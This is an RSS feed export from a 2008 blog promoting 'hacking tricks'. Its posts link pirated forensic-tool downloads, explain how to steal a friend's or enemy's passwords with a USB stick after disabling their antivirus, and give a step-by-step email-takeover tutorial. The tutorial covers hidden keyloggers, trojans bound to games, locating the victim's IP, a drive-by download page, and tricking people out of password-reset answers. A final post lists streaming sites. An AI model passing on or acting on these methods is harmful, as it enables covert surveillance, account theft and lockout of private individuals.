<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3865216611793770662</atom:id><lastBuildDate>Tue, 18 Apr 2023 13:43:39 +0000</lastBuildDate><title>Sophisticated Downloads and Tricks .</title><description>Frnds this site is for a learning purpose... you can find here all the latest hacking tricks, u can hack yahoo,orkut,gmail any so on, &amp; latest softwares which r compulsory needed for ur computer......I hopu u ll like it!!!</description><link>http://freedownloaz.blogspot.com/</link><managingEditor>noreply@blogger.com (saien)</managingEditor><generator>Blogger</generator><openSearch:totalResults>68</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>Frnds this site is for a learning purpose... you can find here all the latest hacking tricks, u can hack yahoo,orkut,gmail any so on, &amp; latest softwares which r compulsory needed for ur computer......I hopu u ll like it!!!</itunes:subtitle><itunes:category text="Technology"><itunes:category text="Tech News"/></itunes:category><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-6711641767346523927</guid><pubDate>Sun, 02 Mar 2008 15:45:00 +0000</pubDate><atom:updated>2008-03-02T07:51:43.555-08:00</atom:updated><title>FBI Forensic Field Kit</title><description>&lt;h3 style="color: rgb(0, 0, 0); font-weight: normal; text-align: justify;" class="smller"&gt;FBI Forensic Field Kit....&lt;br /&gt;&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style="color: rgb(0, 0, 0);" &gt;FBI Forensic Field Kit - Bootable&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://i23.tinypic.com/2li8p3p.jpg" target="_blank"&gt;&lt;img alt="http://i23.tinypic.com/2li8p3p.jpg" src="http://i23.tinypic.com/2li8p3p.jpg" /&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;&lt;a href="http://i23.tinypic.com/2li8p3p.jpg" target="_blank"&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;This is the ultimate bootable Disk for the agent, (or wannabe agent).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Forensics Tools:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Sleuth Kit -Forensics Kit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Py-Flag - Forensics Browser&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Autopsy - Forensics Browser for Sleuth Kit&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;dcfldd - DD Imaging Tool command line tool and also works with AIR&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;foremost - Data Carver command line tool&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Air - Forensics Imaging GUI&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;md5deep - MD5 Hashing Program&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;netcat - Command Line&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;cryptcat - Command Line&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;NTFS-Tools&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;qtparted - GUI Partitioning Tool&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;regviewer - Windows Registry Viewer&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;X-Ways WinTrace&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;X-Ways WinHex&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;X-Ways Forensics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;R-Studio Emergency (Bootable Recovery media Maker)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;R-Studio Network Edtion&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;R-Studio RS Agent&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Net resident&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Faces 3 Full (600 megs)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Encase 4.20&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Field Kit Manuals&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Incident response - Computer Forensics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Computer Crime investigation&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Forensic Pathology&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Internet Forensics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Forensic interpretation of Evidence&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Windows Forensics&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Computer Forensics -An Illustrated Dictionary&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Computer Forensics - jumpstart&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Additional programs on Boot DVD:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Gentoo Linux 2.6 Kernel - Opyimized for Forensics Use&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;XFCE - GUI&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Apache2 - Server&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Mysql PHP4&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Open Office&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Gimp - Graphics Program&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;KSnapshot - Screen Capture Program&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Mozilla&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Gnome CD Master&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;K3b - CD Burner&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;XMMS - media player&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Porthole - Gentoo Graphics Package Manager&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Karchiver - GZIp GUI&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Security Tools:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Etherape - GUI Network Traffic Monitor&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Clamv - Anti Virus&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;snort - Command Line&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;John the Ripper - Command Line password cracker&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;rkhunter - Command Line&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Ethereal - Network Traffic Analyzer&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;FWBuilder - GUI Firewall App&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;nessus - network scanner&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);" &gt;Download here FBI Tool Kit:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;" class="para"&gt; &lt;ol&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56210993/F.B.I._Field_Kit.part01.rar" target="_blank"&gt;http://rapidshare.com/files/56210993/F.&lt;wbr&gt;B.I._Field_Kit.part01.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56216721/F.B.I._Field_Kit.part02.rar" target="_blank"&gt;http://rapidshare.com/files/56216721/F.&lt;wbr&gt;B.I._Field_Kit.part02.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56221834/F.B.I._Field_Kit.part03.rar" target="_blank"&gt;http://rapidshare.com/files/56221834/F.&lt;wbr&gt;B.I._Field_Kit.part03.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56227058/F.B.I._Field_Kit.part04.rar" target="_blank"&gt;http://rapidshare.com/files/56227058/F.&lt;wbr&gt;B.I._Field_Kit.part04.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56231002/F.B.I._Field_Kit.part05.rar" target="_blank"&gt;http://rapidshare.com/files/56231002/F.&lt;wbr&gt;B.I._Field_Kit.part05.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56234996/F.B.I._Field_Kit.part06.rar" target="_blank"&gt;http://rapidshare.com/files/56234996/F.&lt;wbr&gt;B.I._Field_Kit.part06.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56239049/F.B.I._Field_Kit.part07.rar" target="_blank"&gt;http://rapidshare.com/files/56239049/F.&lt;wbr&gt;B.I._Field_Kit.part07.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56243909/F.B.I._Field_Kit.part08.rar" target="_blank"&gt;http://rapidshare.com/files/56243909/F.&lt;wbr&gt;B.I._Field_Kit.part08.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56249069/F.B.I._Field_Kit.part09.rar" target="_blank"&gt;http://rapidshare.com/files/56249069/F.&lt;wbr&gt;B.I._Field_Kit.part09.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56255086/F.B.I._Field_Kit.part10.rar" target="_blank"&gt;http://rapidshare.com/files/56255086/F.&lt;wbr&gt;B.I._Field_Kit.part10.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56261284/F.B.I._Field_Kit.part11.rar" target="_blank"&gt;http://rapidshare.com/files/56261284/F.&lt;wbr&gt;B.I._Field_Kit.part11.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;li&gt;&lt;i&gt;&lt;a href="http://rapidshare.com/files/56267357/F.B.I._Field_Kit.part12.rar" target="_blank"&gt;http://rapidshare.com/files/56267357/F.&lt;wbr&gt;B.I._Field_Kit.part12.rar&lt;/a&gt;&lt;/i&gt;&lt;/li&gt;&lt;/ol&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;i&gt; &lt;/i&gt; &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/03/fbi-forensic-field-kit.html</link><author>noreply@blogger.com (saien)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://i23.tinypic.com/2li8p3p_th.jpg" width="72"/><thr:total>28</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-3720721537702714725</guid><pubDate>Sun, 02 Mar 2008 15:34:00 +0000</pubDate><atom:updated>2008-03-02T07:56:05.909-08:00</atom:updated><title>Hack a PC by USB..</title><description>Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...&lt;br /&gt;&lt;br /&gt;Download this software:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mediafire.com/?f3ddzyenlug" target="_blank"&gt;http://www.mediafire.com/?f3ddzyenlug&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt; Extract it.&lt;/li&gt;&lt;li&gt; open pcinfo&lt;/li&gt;&lt;li&gt; select all the files and paste it in ur USB(pendrive) &lt;/li&gt;&lt;li&gt; it in the pc u wanna hack...&lt;/li&gt;&lt;li&gt; Open the USB drive, give it 2 sec and and ur job is done...&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;And now open the dump folder in ur pc and u will have all the info u want....&lt;br /&gt;&lt;br /&gt;Info u will obtain:&lt;br /&gt;&lt;br /&gt;&lt;img alt="http://i16.tinypic.com/71pn1ms.jpg" src="http://i16.tinypic.com/71pn1ms.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;Ok now the problem which i was facing....&lt;br /&gt;&lt;br /&gt;well i think it duznt autorun on PC with antivirus... U have to manually click the nircmd.exe&lt;br /&gt;&lt;br /&gt;U have to disable his/her antivirus for auto running this program..&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/03/hack-pc-by-usb.html</link><author>noreply@blogger.com (saien)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://i16.tinypic.com/71pn1ms_th.jpg" width="72"/><thr:total>12</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-7190111215171928651</guid><pubDate>Sun, 02 Mar 2008 15:10:00 +0000</pubDate><atom:updated>2008-03-02T07:22:51.287-08:00</atom:updated><title>Whether Mail Hacking is possible?</title><description>&lt;div style="text-align: justify;"&gt;Whether Mail Hacking is possible?&lt;br /&gt;&lt;br /&gt;This topic is favourite of all newbies&lt;br /&gt;EMAIL PASSWORD HACKING&lt;br /&gt;First of all it is very difficult to crack any mail server&lt;br /&gt;like yahoo,google,msn etc.&lt;br /&gt;ANd even if you crack into their server it is not possible to decode the password&lt;br /&gt;so just forget abt this method&lt;br /&gt;We will try something different&lt;br /&gt;&lt;br /&gt;If u have physical access(direct access) to someone's PC and u want to hack his account password then it is the best thing for us.U don't need anything better than that,all u hv to do is to download a good keylogger to ur pc and copy it in ur pendrive or cd&lt;br /&gt;and install the keylogger in the victim's pc.That's it.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html"&gt;KEYLOGGER&lt;/a&gt;:-This are the program which records the every keystrokes on keyboard which means it will record all passwords also.The data will be stored on the victims computer only(they r stored in one file which is usually located in system folder) but as u hv physical access u can access this file easily&lt;br /&gt;some &lt;a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html"&gt;keyloggers&lt;/a&gt; are hidden so the victim will not hv ne clue abt it and ur work will be done easily.click &lt;a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html"&gt;here&lt;/a&gt; to see how it works&lt;br /&gt;&lt;br /&gt;Most of u will say that u don't hv direct access to the victim's pc.It is little difficult to get password if u don't hv direct access to victim's pc.&lt;br /&gt;In this kinda situations u can use trojan's for this.There r many trojans available on internet.U can find many using google.If u want u can scrap in my orkut profile.&lt;a href="http://www.orkut.com/Profile.aspx?uid=5276101150478462485"&gt;http://www.orkut.com/Profile.aspx?uid=5276101150478462485&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.&lt;br /&gt;&lt;br /&gt;To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...&lt;br /&gt;&lt;br /&gt;On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).&lt;br /&gt;&lt;br /&gt;If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.&lt;br /&gt;&lt;br /&gt;The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.&lt;br /&gt;&lt;br /&gt;So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.&lt;br /&gt;&lt;br /&gt;Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.&lt;br /&gt;&lt;br /&gt;Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...&lt;br /&gt;&lt;br /&gt;While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&amp;amp;lngWId=8"&gt;http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&amp;amp;lngWId=8&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.&lt;br /&gt;&lt;br /&gt;If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.&lt;br /&gt;&lt;br /&gt;First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial..&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/03/whether-mail-hacking-is-possible.html</link><author>noreply@blogger.com (saien)</author><thr:total>12</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-5803974901609478111</guid><pubDate>Fri, 29 Feb 2008 17:09:00 +0000</pubDate><atom:updated>2008-02-29T10:39:19.097-08:00</atom:updated><title>Online  TV</title><description>&lt;div style="text-align: justify;"&gt;Watch TV online here are some free online tv websites, they offer u with channels which u watch on tv &amp;amp;  also the channels which u haven't seen them before..Here u can get all types of channels from education to entertainment, all types of movies &amp;amp; many more....The most important is u can watch cricket live matches if ur subscriber is unable to afford those channels..&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.blogger.com/www.live-from-bd.com"&gt;&lt;/a&gt;&lt;a href="http://www.live-from-bd.com"&gt;&lt;span style="font-weight: bold;"&gt;www.live-from-bd.com&lt;/span&gt;&lt;/a&gt; : The site called "Live from Bangladesh". The site has list of all the famous Indian channels that you can watch online. Zee TV, Sony TV, Star One, Star Plus, Zee Cinema etc. The site doesn't require you to register. All you need is Windows Media Player 10, Real Player, VLC Media Player installed on your machine. You must be aware of Windows Media Player and Real Player. You can get VLC media player free, just google it and you will find it. Once you go to the website, you will see list of channels on the left. Click on the channel you want to see and you would see the screen with username and password information. The popup box will ask you to enter that information and you should be all set. Watch Zee Cinema Online, Watch Zee TV online, Watch Sony TV Online and enjoy.&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.idesitv.com"&gt;&lt;span style="font-weight: bold;"&gt;www.idesitv.com&lt;/span&gt;&lt;/a&gt;: This site used to require registration but they have changed their layout and now its just simple page with list of channels URLs. Click on the channel and a popup window will open up. Same list of channels are available here. Less than what you get from the previous site. Few sites have voice issue. The voice and video moves in fast forward motion makes it sound funny. For e.g. Sony TV &amp;amp; Star One.&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.djzaki.com"&gt;&lt;span style="font-weight: bold;"&gt;www.djzaki.com&lt;/span&gt;&lt;/a&gt;: I don't believe this site has online channels but you can watch videos clippings from these Indian Channels. This site requires registration.&lt;br /&gt;&lt;br /&gt;* &lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.nepalisite.com/tv"&gt;www.nepalisite.com/tv&lt;/a&gt; &lt;/span&gt;: This site has only 5-6 channels but the quality is good and doesn't have annoying ads. It has Zee, Sony, Sony Max, Star Plus, Aaj Tak, IBN Live, Star One. I would rank this site as 2nd after live-from-bd.com. Watch Star Plus Online.&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.onlinemedia.in"&gt;&lt;span style="font-weight: bold;"&gt;www.onlinemedia.in&lt;/span&gt;&lt;/a&gt;: Beware of this website. It does provide all these channels but has lot of popup ads and could have spywares. I would go to this site as a last option.&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.musicnmovies.com"&gt;&lt;span style="font-weight: bold;"&gt;www.musicnmovies.com&lt;/span&gt;&lt;/a&gt;: Music 'n Movies is based on free media Meta-crawler, which searches on the media file hosting servers for free bollywood movies , indexes them and present them in well format on this portal.&lt;br /&gt;&lt;br /&gt;*&lt;span style="font-weight: bold;"&gt; &lt;a href="http://%20viewmy.tv"&gt;viewmy.tv&lt;/a&gt;&lt;/span&gt;&lt;a href="http://%20viewmy.tv"&gt; &lt;/a&gt;:Check out a free new live internet tv service called http://viewmy.tv - an excellent website that allows you to watch internet TV from all over the world, they even let you create your own personal page and have tons of features, like search, countries, genres, multi-lingual descriptions, channel bitrate quality monitoring, rss feeds for blogs, full screen, mini screen options !! everyone's watching viewmy.tv.&lt;br /&gt;&lt;br /&gt;* &lt;a href="http://www.tvcells.org"&gt;&lt;span style="font-weight: bold;"&gt;www.tvcells.org&lt;/span&gt;&lt;/a&gt; :Its another site to watch tv online&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;* World Wide Internet Television&lt;/span&gt;: Also known as, wwitv.com is a nice site with over 1000 listings of TV channels that you can use to watch TV online for free. While I haven't counted the languages or countries represented there seem to be quite a few ! This is a site I visit often when I want to watch something in Spanish, followed by something in Hindi. The site requires Real Player and is very easy to use and navigate.&lt;br /&gt;&lt;br /&gt;* &lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.streambox.tv"&gt;www.streambox.tv&lt;/a&gt; &lt;/span&gt;:StreamBox is a web-streaming portal that live-streams Indian TV channels through the internet. Just like how TV channels are telecasted through cable or dish, StreamBox telecasts Indian TV channels through the internet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    Here is the collection of some more sites:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;  &lt;a href="http://www.infomaza.com/"&gt;&lt;span&gt;  http://www.infomaza.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.moviesfromindia.com/"&gt;&lt;span&gt;    http://www.moviesfromindia.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.musicspice.com/"&gt;&lt;span&gt;    http://www.musicspice.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://asian-sensations.com/"&gt;&lt;span&gt;    http://asian-sensations.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.shareview.us/"&gt;&lt;span&gt;    http://www.shareview.us/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.vzvideo.com/"&gt;&lt;span&gt;    http://www.vzvideo.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.firstdesitv.com/"&gt;&lt;span&gt;    http://www.firstdesitv.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.bollydhoom.com/"&gt;&lt;span&gt;    http://www.bollydhoom.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.lordoftv.com/"&gt;&lt;span&gt;    http://www.lordoftv.com/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.jumptv.com/en"&gt;&lt;span&gt;   http://www.jumptv.com/en&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.revision3.com/indigital"&gt;&lt;span&gt;   http://www.revision3.com/indigital&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://revision3.com/diggnation"&gt;&lt;span&gt;   http://revision3.com/diggnation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://duggmirror.com/tech_news/techtv_r"&gt;&lt;span&gt;   http://duggmirror.com/tech_news/techtv_r&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.freebe.tv/"&gt;&lt;span&gt;   http://www.freebe.tv&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.wwitv.com/"&gt;&lt;span&gt;   http://www.wwitv.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.channelchooser.com/"&gt;&lt;span&gt;   http://www.channelchooser.com&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.getdemocracy.com/"&gt;&lt;span&gt;   